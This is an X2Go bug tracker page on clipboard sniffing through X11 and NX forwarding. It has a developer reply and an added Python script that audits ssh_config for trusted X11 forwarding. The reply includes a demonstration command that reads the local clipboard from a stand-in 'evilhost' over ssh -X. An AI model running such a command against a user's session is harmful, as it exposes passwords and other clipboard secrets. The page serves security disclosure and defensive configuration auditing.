X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Full log



X-Loop: owner@bugs.x2go.org
Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Reply-To: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>, 258@bugs.x2go.org
Resent-From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
Resent-To: x2go-dev@lists.berlios.de
Resent-CC: X2Go Developers <x2go-dev@lists.berlios.de>
X-Loop: owner@bugs.x2go.org
Resent-Date: Mon, 01 Jul 2013 12:03:02 +0000
Resent-Message-ID: <handler.258.B258.137267939828332@bugs.x2go.org>
Resent-Sender: owner@bugs.x2go.org
X-X2Go-PR-Message: followup 258
X-X2Go-PR-Package: x2goclient
X-X2Go-PR-Keywords: security
Received: via spool by 258-submit@bugs.x2go.org id=B258.137267939828332
          (code B ref 258); Mon, 01 Jul 2013 12:03:02 +0000
Received: (at 258) by bugs.x2go.org; 1 Jul 2013 11:49:58 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
	ymir.das-netzwerkteam.de
X-Spam-Level: 
X-Spam-Status: No, score=0.0 required=5.0 tests=URIBL_BLOCKED autolearn=ham
	version=3.3.2
X-Greylist: delayed 361 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 13:49:57 CEST
Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103])
	by ymir (Postfix) with ESMTPS id AD2895DA79
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 13:49:57 +0200 (CEST)
Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90])
	by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 739AC6808EE;
	Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763)
	id 6D466B604D8; Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Date: Mon, 1 Jul 2013 13:43:56 +0200
From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net>
X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory
 dimona cocaine guantanamo centrifuge holy war pigs mossad nsa
X-Echelon-Result: Belligerent
User-Agent: Mutt/1.5.21 (2010-09-15)
On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
> 
> Hi.
> 
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
> 
> 
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is an extremely critical hole.

I disagree; this is not a hole at all, it works as intended. It's just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.

But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.



Ciao,

Alexander Wuerstlein.
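
The `ssh -X user@evilhost "xclip -o"` remark above has one mitigation on the OpenSSH side that the reply does not spell out: with untrusted forwarding (`ssh -X`, `ForwardX11Trusted no`) the remote side's X clients run under the X11 SECURITY extension, which restricts cut-and-paste and other access between untrusted and trusted clients; with trusted forwarding (`ssh -Y`, `ForwardX11Trusted yes`) those restrictions are lifted and the remote client has the full access the reply describes. The script below is an added example, not code from this bug log or the X2Go project: it parses an ssh_config in the first-obtained-value-wins order that ssh_config(5) specifies and reports, per host, whether X11 forwarding is off, untrusted, or trusted. The configuration text, host names and the `audit_x11_forwarding` function are constructed for the example.

```python
"""Audit an OpenSSH client configuration for trusted X11 forwarding.

Added example, not code from the X2Go bug log or the X2Go project.
ForwardX11Trusted yes (or `ssh -Y`) exempts the remote side's X clients
from the X11 SECURITY extension, giving them full access to the local
display, selections included. The config below is a constructed sample.
"""
import fnmatch
import re

# Constructed sample ssh_config; host names are placeholders.
SAMPLE_SSH_CONFIG = """\
Host build-box
    HostName build.example.net
    ForwardX11 yes
    ForwardX11Trusted yes

Host shell-*
    ForwardX11 yes
    ForwardX11Trusted no

Host *
    ForwardX11 no
    # Debian's stock /etc/ssh/ssh_config ships this as "yes", which
    # makes a plain "ssh -X" behave like "ssh -Y" there.
    ForwardX11Trusted yes
"""


def parse_ssh_config(text):
    """Split ssh_config text into (host_patterns, {keyword: value}) blocks.

    Keywords are case-insensitive and may be separated from their argument
    by whitespace or "=". Lines before the first Host line apply to every host.
    """
    blocks = []
    patterns, options = ["*"], {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue                            # keyword without an argument
        key, value = parts[0].lower(), parts[1].strip()
        if key == "host":
            blocks.append((patterns, options))
            patterns, options = value.split(), {}
        else:
            options.setdefault(key, value)      # first value in a block wins
    blocks.append((patterns, options))
    return blocks


def host_matches(patterns, host):
    """Apply ssh_config Host patterns: * and ? wildcards, a leading ! negates."""
    matched = False
    for pat in patterns:
        if pat.startswith("!"):
            if fnmatch.fnmatchcase(host, pat[1:]):
                return False
        elif fnmatch.fnmatchcase(host, pat):
            matched = True
    return matched


def effective_option(blocks, host, key, default):
    """The first matching block that sets the keyword wins, as in ssh_config(5)."""
    for patterns, options in blocks:
        if key in options and host_matches(patterns, host):
            return options[key].lower()
    return default


def audit_x11_forwarding(text, hosts):
    """Classify each host's X11 forwarding as 'trusted', 'untrusted' or 'off'.

    Defaults are upstream OpenSSH's (both keywords default to "no"); a
    distribution default or -X/-Y on the command line can override them.
    """
    blocks = parse_ssh_config(text)
    findings = {}
    for host in hosts:
        forward = effective_option(blocks, host, "forwardx11", "no") == "yes"
        trusted = effective_option(blocks, host, "forwardx11trusted", "no") == "yes"
        if forward and trusted:
            findings[host] = "trusted"      # remote clients bypass the SECURITY extension
        elif forward:
            findings[host] = "untrusted"    # SECURITY extension restrictions apply
        else:
            findings[host] = "off"
    return findings


if __name__ == "__main__":
    report = audit_x11_forwarding(
        SAMPLE_SSH_CONFIG, ["build-box", "shell-01", "other.example.org"]
    )
    for host, level in report.items():
        print(f"{host:20} X11 forwarding: {level}")
```

Note that this only covers OpenSSH's own X11 forwarding. x2goclient runs its NX proxy over an SSH tunnel rather than through `ssh -X`, so the audit says nothing about an X2Go session; there the clipboard behaviour belongs to x2goagent and x2goclient, which is exactly the switch the reply above says is missing.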



X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Nov 21 14:56:20 2024; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system
